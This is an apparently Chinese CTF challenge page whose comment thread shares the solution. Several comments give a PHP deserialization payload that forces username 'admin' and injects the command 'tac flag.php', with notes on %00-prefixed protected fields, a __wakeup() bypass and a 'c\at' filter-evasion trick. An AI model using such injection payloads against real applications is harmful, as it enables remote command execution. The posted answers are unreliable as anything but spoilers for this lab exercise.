评分(3)
解题动态
yamojito 攻破了该题 21小时前
姥姥 攻破了该题 2天前
聪10011 攻破了该题 2天前
Slime1001 攻破了该题 2天前
zhuyh69 攻破了该题 3天前
凌晨3点的阳光 攻破了该题 4天前
eason2023 攻破了该题 4天前
huasir 攻破了该题 5天前
孙燕姿圈外男友 攻破了该题 7天前
xrq01 攻破了该题 9天前
19957910119 攻破了该题 13天前
Amitaya 攻破了该题 14天前
kbhjt 攻破了该题 15天前
flying610 攻破了该题 15天前
zzzzqqqqq 攻破了该题 15天前
admin123 攻破了该题 18天前
胡萝卜 攻破了该题 19天前
hupeng888 攻破了该题 20天前
admit 攻破了该题 21天前
评论
admit 21天前
举报
/?code=O:3:%22ctf%22:3:{s:11:%22%00*%00username%22;s:5:%22admin%22;s:6:%22%00*%00cmd%22;s:12:%22tac%20flag.php%22;}
iNMB 2月前
举报
此外必须用 %00(空字符),不能用 %20(空格)。 protected 声明的字段为保护字段,在所声明的类和该类的子类中可见,但在该类的对象实例中不可见。 因此保护字段的字段名在序列化时,字段名前面会加上 \0*\0 的前缀,注意,这里的 \0 表示 ASCII 码为 0 的字符,也就是我们经过 urlencode 后看到的 %00 。
iNMB 2月前
举报
绕过__wakeup()后使用tac等其他输出字符的命令即可
llc123 4月前
举报
c\at flag.php也行
pezn1and 4月前
举报
code=O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
zbss 5月前
举报
备份网站没有文件,环境出问题了吧,退钱,我还试了两次
iamblue 6月前
举报
O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6%3A%22%00%2A%00cmd%22%3Bs%3A12%3A%22tac+flag.php%22%3B%7D
tfios 7月前
举报
环境变量里边也有 FLAG
LLTVLL 1年前
举报
AI分析PHP序列化程序得出结果,注意补空格和占位符,降低学习PHP语言的成本,提升准确率。。。。
Bojing 1年前
举报
有哪里提示了username是admin的吗
numberone 1年前
举报
源代码里不是有个if语句:if ($this->username === 'admin')